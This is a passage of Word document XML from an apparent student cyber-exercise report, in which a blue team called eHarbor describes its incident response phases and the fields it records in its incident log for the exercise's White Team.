          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following sections introduce the key content of each</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> phase</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0775FC" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="00355033" w:rsidRDefault="002D30D9" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355033">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD421FF" w14:textId="016A72B6" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The activities associated with the phase aim at ensuring that eHarbor is able to efficiently prevent, detect, analyze, respond to and recover from cybersecurity incidents. The activities are both technical and organizational in nature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and are not illustrated in the above processes (Figure 1 and 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37292E85" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="00355033" w:rsidRDefault="002D30D9" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355033">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B559D72" w14:textId="762335F1" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eHarbor has implemented detection technology throughout its IT infrastructure. eHarbor employes both internal and external resources for monitoring </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>its operating environment</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 24/7/365. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The above processes (Figure 1 and 2) start from detecting a potentially malicious event. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E85F866" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="00355033" w:rsidRDefault="002D30D9" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355033">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5848B0" w14:textId="311ACB56" w:rsidR="002D30D9" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upon becoming aware of a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n event</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the first step of analysis is to triage the alert. During the triage eHarbor performs the first five minutes analysis of the alert and assigns an initial severity level to the alerts not clearly identified as false positives.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E97D5A" w14:textId="77777777" w:rsidR="002D30D9" w:rsidRPr="008C5F51" w:rsidRDefault="002D30D9" w:rsidP="002D30D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eHarbor will report all analyzed events to the White Team and will provide updates whenever new meaningful information is identified. After the initial analysis, especially in cases where eHarbor is dealing with a major incident, the analysis can continue after the first notification to the White Team. The purpose of the analysis is to provide enough information so that the next phases of the process can be conducted. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF76D78" w14:textId="77777777" w:rsidR="00E970C7" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mitigation plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC8D1C2" w14:textId="6843B406" w:rsidR="00E970C7" w:rsidRPr="00E970C7" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In general, the phase aims to address the measures eHarbor would take to contain, eradicate, and recover from the incident. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F6BC7" w14:textId="0878C2FE" w:rsidR="00E970C7" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> first step of responding to an incident is to </w:t>
      </w:r>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contain</w:t>
      </w:r>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it to stop the incident from spreading throughout the network. Once the incident is contained a decision is made whether the incident requires further analysis - including potential forensics gathering. If such activities are required, they should be carried out before </w:t>
      </w:r>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eradication</w:t>
      </w:r>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448AAF8C" w14:textId="13D3C14A" w:rsidR="00E970C7" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">During the </w:t>
      </w:r>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eradication</w:t>
      </w:r>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the components of the incident are eliminated. Such activities are, for example, removing malware or reset of a breached password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40003B36" w14:textId="02F311F4" w:rsidR="00E970C7" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After successful eradication of the incident component, the system will be </w:t>
      </w:r>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recovered</w:t>
      </w:r>
      <w:r w:rsidRPr="00260BC6">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to normal operation. Upon restoration, the system administrators confirm that the system is functioning normally. Furthermore, potential vulnerabilities are remediated to prevent similar incidents in the future. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA5380C" w14:textId="7B25FA3E" w:rsidR="00E970C7" w:rsidRPr="008C5F51" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon creating </w:t>
      </w:r>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a mitigation plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the plan is communicated to the White Team. If the plan is approved, the active phase of the incident response plan is done, and the process moves on to the final phase. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C641CFF" w14:textId="77777777" w:rsidR="00E970C7" w:rsidRPr="00355033" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355033">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Post-incident Activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B92731" w14:textId="77777777" w:rsidR="00E970C7" w:rsidRPr="008C5F51" w:rsidRDefault="00E970C7" w:rsidP="00E970C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-incident activities include documenting the incident and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>analyzing its root cause if the root cause has not yet been identified</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. eHarbor </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>also evaluates</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lessons learned from</w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="008C5F51">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">incident and when possible, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">adjusts its processes based on it.  Furthermore, all identified indications of compromise are communicated to other Blue Teams at the lates on this stage. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F253939" w14:textId="73990A50" w:rsidR="00870D5F" w:rsidRDefault="0034381B" w:rsidP="0034381B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc163900535"/>
      <w:r>
        <w:t>Incident log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="68A65777" w14:textId="0079E74A" w:rsidR="004536F4" w:rsidRDefault="004536F4" w:rsidP="004536F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The incident log includes an overview of all incidents handled by eHarbor. More detailed incident-specific reports are created about explicitly chosen incidents in Microsoft Word as a part of the group assignment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690977E9" w14:textId="0C39367C" w:rsidR="004536F4" w:rsidRDefault="004536F4" w:rsidP="004536F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">eHarbor maintains a central incident log in Microsoft Excel to which all incidents are recorded. More detailed incident-specific timelines are created case-by-case. All incident response related documentation is stored in the incident response team Teams-channel (BT2 – eHarbor). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC06F4F" w14:textId="2B4A13DE" w:rsidR="004536F4" w:rsidRDefault="004536F4" w:rsidP="004536F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Where applicable, the incident log includes the following information as requested by White Team:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23424CA1" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRPr="0045341D" w:rsidRDefault="006D2CE2" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incident ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418291AF" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRPr="0045341D" w:rsidRDefault="006D2CE2" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491BAE35" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRPr="0045341D" w:rsidRDefault="006D2CE2" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Event environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6F39B" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRPr="0045341D" w:rsidRDefault="006D2CE2" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Indicators of compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEC5EAC" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRPr="0045341D" w:rsidRDefault="006D2CE2" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mitigation plan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF8AC66" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRDefault="006D2CE2" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Root-cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791B3A4" w14:textId="77777777" w:rsidR="006D2CE2" w:rsidRDefault="006D2CE2" w:rsidP="006D2CE2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B025FC2" w14:textId="39CD1AA5" w:rsidR="008E595F" w:rsidRPr="0045341D" w:rsidRDefault="008E595F" w:rsidP="008E595F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, eHarbor will include the following details to its incident log to aid its post-exercise documentation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25208C77" w14:textId="77777777" w:rsidR="008E595F" w:rsidRPr="0045341D" w:rsidRDefault="008E595F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incident description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB975CA" w14:textId="77777777" w:rsidR="008E595F" w:rsidRPr="0045341D" w:rsidRDefault="008E595F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Minor / Major Incident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8A7F1" w14:textId="77777777" w:rsidR="008E595F" w:rsidRPr="0045341D" w:rsidRDefault="008E595F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affected systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A5C91C" w14:textId="2E82EA18" w:rsidR="008E595F" w:rsidRDefault="008E595F" w:rsidP="00E674B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045341D">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Affected users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF03909" w14:textId="77777777" w:rsidR="008E595F" w:rsidRPr="008E595F" w:rsidRDefault="008E595F" w:rsidP="008E595F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1304"/>
          <w:tab w:val="left" w:pos="2608"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AB1364" w14:textId="76066A33" w:rsidR="008E595F" w:rsidRDefault="008E595F" w:rsidP="008E595F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos Display"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The incident response team has a nominated secretary responsible for maintaining the incident response related documentation. The reporting is supported by the whole incident response team. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557C7932" w14:textId="231E4CF5" w:rsidR="006D2CE2" w:rsidRDefault="008E595F" w:rsidP="004536F4">
      <w:pPr>
        <w:rPr>
